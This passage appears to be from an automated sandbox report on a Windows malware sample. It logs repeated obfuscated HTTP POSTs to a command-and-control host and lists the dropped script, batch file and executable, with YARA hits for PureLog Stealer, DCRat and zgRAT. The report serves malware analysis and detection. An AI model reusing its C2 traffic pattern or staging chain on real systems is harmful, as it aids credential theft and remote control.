Dec 6, 2024 03:15:21.342262030 CET	1012	OUT	Data Raw: 53 51 5a 5d 59 5c 53 59 5c 56 52 5a 50 5e 5a 57 58 5b 5b 58 50 5c 56 5f 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SQZ]Y\SY\VRZP^ZWX[[XP\V_Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!(#"!0+5#%861,$$)Y#<5&:/]#+?;']/!Q!0
Dec 6, 2024 03:15:22.084883928 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:15:22.348702908 CET	809	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:15:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5U3KncZnA8HSl3Qe30K8qefGBFjrSgiX4eBrQfvzkcGRFqbjHI6XD%2BRXRJfgUu2t1seqv1IfIkUiG3%2FfYXQWdomHXdR0629LkYqwk4ZHKu8Rk2NLNrDR5Fv%2Fu2VY%2BMSuQ5W5eTu3oE8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c48a0e90de96-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3585&min_rtt=1665&rtt_var=4466&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=85726&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.6	50134	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:15:22.589565992 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:15:22.937560081 CET	1012	OUT	Data Raw: 56 57 5a 5c 59 5c 53 5f 5c 56 52 5a 50 5d 5a 51 58 5c 5b 5c 50 55 56 55 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VWZ\Y\S_\VRZP]ZQX\[\PUVUZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!>=>3U(+Z2-2?'V0;.*0#!W1/Y!V,']/!Q!
Dec 6, 2024 03:15:23.695394993 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:15:23.930843115 CET	803	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:15:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CuSGFMdZA9rgpWgUw2lQ4aLPCjudXNNr5NrSevVhAmXnMKkWiqkLQEYgINgLRpQ20r31xyPavSJQ%2BxcIf7dXPCSSQnL2OETiWr1JMc5ZBU9l9diBMx66vNTkCmg4cJmmf6NN2plfcxA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c49409a74378-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4874&min_rtt=1587&rtt_var=7170&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=52352&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.6	50136	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:15:24.177777052 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:15:24.529716015 CET	1012	OUT	Data Raw: 53 54 5f 5f 59 5e 56 59 5c 56 52 5a 50 5e 5a 54 58 59 5b 5c 50 55 56 5c 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: ST__Y^VY\VRZP^ZTXY[\PUV\Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP">2>/($%]92Z<3*-+X!?S1#6;7.-']/!Q!0
Dec 6, 2024 03:15:25.272584915 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:15:25.543132067 CET	806	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:15:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HqX1JYtAUGDUvc3vnvIQgwT0If4i9hy%2FIQIt4s9wMaSp0ZOY3STSoA93Dq6nT8aD4%2F4yBteiRYSuesrsAA3vk6R3UPzOLJw99PNdoaikUJ61F19uKRWJtXbI5dSRlnU4qZOtaOWfh3o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c49dfff4c3f3-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3221&min_rtt=1613&rtt_var=3821&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=100842&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.6	50137	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:15:25.788784981 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:15:26.139050007 CET	1012	OUT	Data Raw: 56 52 5f 51 59 5c 56 52 5c 56 52 5a 50 58 5a 55 58 53 5b 5a 50 5f 56 5d 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VR_QY\VR\VRZPXZUXS[ZP_V]Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!)=)T,>&('+2%("X>$#Y2*(53R/']/!Q!(
Dec 6, 2024 03:15:26.957426071 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:15:27.190922976 CET	819	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:15:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3EihOvrFvpK0Tk%2B6F0HMIwrUtnH9tzEm%2F6XRj5rt7t3a3VrmQzm56xRABL2DZpTQDO9Kj93RrfBONOGI2pp7SwZ1Sf5VUQH6do9J%2FGOLa2%2F%2BE8C0XZfunF3kB%2BhRHpiu0f%2BnvP5%2FNUM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c4a82c1e7cb2-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=10369&min_rtt=1931&rtt_var=17600&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=21026&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.6	50138	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:15:27.432301044 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:15:27.780832052 CET	1012	OUT	Data Raw: 53 51 5a 5e 59 5a 56 59 5c 56 52 5a 50 5f 5a 56 58 5a 5b 56 50 58 56 5c 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SQZ^YZVY\VRZP_ZVXZ[VPXV\Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP")#9)U?6#_%]&&/''8%>X3[#Y>')#X6+'V,-']/!Q!4
Dec 6, 2024 03:15:28.516891003 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:15:28.750566006 CET	801	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:15:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Zx0o5dVj78dil6cNC1bkOJLFK0pduyqEbk7kuf2CNYl7hRi09VCheSnOyA5jsNagBpp0a60t358eOkHjzaUBBPgzp0hiUsIccBeAFFkYjwDR1CIkwDpEmwfJxQk5sjVxAUNFQrGOew%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c4b24db24257-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4037&min_rtt=1776&rtt_var=5189&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=73481&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.6	50139	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:15:28.997625113 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.6	50140	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:15:29.188620090 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1296 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:15:29.545578957 CET	1296	OUT	Data Raw: 53 51 5f 5d 59 5d 53 5e 5c 56 52 5a 50 5b 5a 57 58 5e 5b 58 50 55 56 5e 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SQ_]Y]S^\VRZP[ZWX^[XPUV^Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!**>1#R(5']1%<32^)7[ /-1#(;']/!Q!$
Dec 6, 2024 03:15:30.273648024 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:15:30.544621944 CET	959	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:15:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uoTtYLKZDK0VfiyiVPEV5fWtsZdlsx%2BrLdJVv606Z%2BBu9V5gJfhKkrSSR2ce1%2BzJERSrFMmk0USZSyswNAuqxKAgXVuCdt%2BI03AVfAohgN7sxnZk8zB3lMWEV0pcyysTTExr5qnjwMs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c4bd3eb342f2-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=6957&min_rtt=1595&rtt_var=11324&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1593&delivery_rate=32810&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 26 02 30 04 3c 58 21 21 24 5b 2c 3d 24 57 26 3e 2e 06 2d 06 2c 5f 22 28 22 07 3f 06 23 0d 27 1a 33 5f 2a 2c 08 02 28 3c 24 08 29 02 23 5b 00 13 25 05 2a 2e 3a 52 28 39 30 5c 27 20 3d 06 2a 26 3e 5c 3e 00 02 08 34 04 2d 5e 35 04 3c 18 27 3d 01 57 2f 43 3f 04 29 37 0c 50 32 0e 21 5e 0e 11 39 51 25 20 22 5f 20 16 3b 54 25 33 23 00 3f 00 24 5f 30 01 20 0e 3f 0a 2c 55 24 32 22 0f 27 59 27 0a 32 03 2e 5f 23 2c 23 1c 2c 3c 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&0<X!!$[,=$W&>.-,_"("?#'3_,(<$)#[%.:R(90\' =*&>\>4-^5<'=W/C?)7P2!^9Q% "_ ;T%3#?$_0 ?,U$2"'Y'2._#,#,<#_,,R5TQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.6	50141	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:15:29.349922895 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:15:29.701613903 CET	1008	OUT	Data Raw: 56 52 5a 5b 59 59 53 5c 5c 56 52 5a 50 5a 5a 5c 58 5f 5b 56 50 5e 56 5a 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VRZ[YYS\\VRZPZZ\X_[VP^VZZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"* :=2+T(5/[15S1,+081(=?7"&)?\";#;']/!Q!
Dec 6, 2024 03:15:30.437341928 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:15:30.701473951 CET	805	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:15:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zbCLidECZQc91XCIWJdIQQ45a65u0z%2Bz1Ew%2F7fCl0vRKv5yaJOcCVbCeAhLalPWSUFvt6fo8aJ7mJqcG9N1wvo4CbcIXBFgPER5264cYCLRQoks4Dsy4dLvuOl2STzqxyFsEGgJAffg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c4be4b657292-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4522&min_rtt=2059&rtt_var=5698&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1305&delivery_rate=67080&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.6	50142	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:15:30.942972898 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:15:31.295545101 CET	1012	OUT	Data Raw: 56 50 5a 5a 59 51 56 53 5c 56 52 5a 50 52 5a 5c 58 5a 5b 5d 50 54 56 55 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VPZZYQVS\VRZPRZ\XZ[]PTVUZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!*=[=!?<S?^&%W&7T$]:)=07?>'9##+;V/-']/!Q!
Dec 6, 2024 03:15:32.067018986 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:15:32.329165936 CET	811	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:15:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2mttiTC0JcSDcaY24lF7BH4fyWSPTS8k%2FHAmtw6%2FxIdsB8z6D3MjRa5HrdPtOY0l5J7jJV6lsIW%2FwRSwTw25JYG%2BGUOfi2oDBdEpMSpKnCkJFOm8ybleIigFO5%2BAsblZgOnzjxVVaHc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c4c85ea942c9-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=8240&min_rtt=4654&rtt_var=8917&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=43788&cwnd=126&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.6	50143	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:15:32.574035883 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:15:32.921535015 CET	1012	OUT	Data Raw: 56 5f 5f 5e 5c 5d 53 5b 5c 56 52 5a 50 59 5a 50 58 5f 5b 5b 50 5d 56 5e 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: V__^\]S[\VRZPYZPX_[[P]V^Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"=.?&4%.$,7W$+>/] =1:/!('V,-']/!Q!,
Dec 6, 2024 03:15:33.660131931 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:15:33.942401886 CET	805	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:15:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mbam3fkh5z%2FGgSy0LoZYz5B7mi1gC8ChOoXQq0mNRlIv5ki8uknv55FjJ6ZOgdBuAN72LLgRGBDVii50EyP4ZfhUdUD8EKOFKYo2P0tt%2FLhmOLvBrKxXlciPvPwbxVnLTMxdYhXYYNo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c4d26894c481-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3661&min_rtt=1682&rtt_var=4589&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=83347&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Target ID:	0
Start time:	21:11:55
Start date:	05/12/2024
Path:	C:\Users\user\Desktop\kqq1aAcVUQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\kqq1aAcVUQ.exe"
Imagebase:	0x220000
File size:	1'769'994 bytes
MD5 hash:	6697A39548B61FCFCF800B206BDBD696
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2105495821.000000000532A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	21:11:55
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\webCrt\gSYhm1mlqujwdrrg55.vbe"
Imagebase:	0x320000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	21:12:02
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\webCrt\bGFjXvZl1lSOMhHdLYZAxlDgwJSuyymnPovMq1RpYbZnEgpXBO1nwlMonY.bat" "
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	21:12:02
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	21:12:02
Start date:	05/12/2024
Path:	C:\webCrt\Surrogatedll.exe
Wow64 process (32bit):	false
Commandline:	"C:\webCrt/Surrogatedll.exe"
Imagebase:	0xf10000
File size:	1'918'976 bytes
MD5 hash:	9FC3AB56804D6BA50E840846783E8AC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.2178061238.0000000000F12000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2205708195.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\webCrt\Surrogatedll.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\webCrt\Surrogatedll.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\webCrt\Surrogatedll.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\webCrt\Surrogatedll.exe, Author: Joe Security Rule: 